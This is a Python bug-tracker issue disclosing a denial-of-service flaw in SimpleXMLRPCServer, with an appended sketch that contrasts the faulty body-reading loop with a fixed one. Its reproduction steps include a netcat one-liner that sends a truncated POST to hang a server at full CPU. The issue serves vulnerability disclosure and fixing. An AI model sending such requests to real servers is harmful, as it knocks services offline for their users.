
Author iankko
Recipients iankko
Date 2012-02-13.13:45:32
Message-id <1329140734.41.0.0376676358855.issue14001@psf.upfronthosting.co.za>
Content
A denial of service flaw was found in the way the Simple XML-RPC Server module of Python processed client connections that were closed before the complete request body had been received. A remote attacker could use this flaw to cause a Python Simple XML-RPC based server process to consume an excessive amount of CPU.

Credit:
Issue reported by Daniel Callaghan

References:
[1] https://bugzilla.redhat.com/show_bug.cgi?id=789790

Steps to reproduce:
------------------
A) for v3.2.2 version:

1) start server:
cat s.py 
#!/usr/local/bin/python3

from xmlrpc.server import SimpleXMLRPCServer
server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()

2) # top

3) issue request from client:
echo -e 'POST /RPC2 HTTP/1.0\r\nContent-Length: 100\r\n\r\nlol bye' | nc localhost 12345

Return to the 'top' screen and see how CPU consumption on the particular host quickly moves to 100%.

B) for v2.7.2 version:

1) start server:

cat s.py 
#!/usr/bin/python

from SimpleXMLRPCServer import SimpleXMLRPCServer

server = SimpleXMLRPCServer(('127.0.0.1', 12345))
server.serve_forever()

Steps 2) and 3) for v2.7.2 version are identical to
those for v3.2.2 version.
History
Date User Action Args
2012-02-13 13:45:34 iankko set recipients: + iankko
2012-02-13 13:45:34 iankko set messageid: <1329140734.41.0.0376676358855.issue14001@psf.upfronthosting.co.za>
2012-02-13 13:45:33 iankko link issue14001 messages
2012-02-13 13:45:32 iankko create
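
Added example (not part of the report above and not the module's own code): a sketch of the failure mode the report describes, a body reader driven only by Content-Length, next to a reader that treats an early close as an error. The function names, the chunk size and the max_spins demo guard are assumptions made for illustration; the sample body is constructed from the request in step 3.

```python
import io

CHUNK = 64 * 1024  # assumed per-read cap, chosen for the example


def read_body_unchecked(rfile, content_length, max_spins=1000):
    """Reader that trusts Content-Length and never checks for EOF.

    Once the peer has closed, read() returns b"" immediately, so
    `remaining` never reaches zero and the loop spins without blocking.
    max_spins exists only so this demo terminates; without it the loop
    would run forever. Returns (bytes_read, empty_reads_observed).
    """
    remaining = content_length
    parts, spins = [], 0
    while remaining:
        chunk = rfile.read(min(remaining, CHUNK))
        parts.append(chunk)
        remaining -= len(chunk)
        if not chunk:
            spins += 1
            if spins >= max_spins:  # demo guard only
                break
    return b"".join(parts), spins


def read_body_checked(rfile, content_length):
    """Same loop, but an empty read means the client went away early."""
    remaining = content_length
    parts = []
    while remaining:
        chunk = rfile.read(min(remaining, CHUNK))
        if not chunk:
            raise ConnectionError(
                f"body truncated: {remaining} of {content_length} bytes missing"
            )
        parts.append(chunk)
        remaining -= len(chunk)
    return b"".join(parts)


if __name__ == "__main__":
    # Constructed sample: 8 bytes sent, Content-Length claims 100.
    sent, claimed = b"lol bye\n", 100
    body, spins = read_body_unchecked(io.BytesIO(sent), claimed)
    print(f"unchecked: got {len(body)} bytes, {spins} empty reads before guard")
    try:
        read_body_checked(io.BytesIO(sent), claimed)
    except ConnectionError as exc:
        print(f"checked: rejected ({exc})")
```
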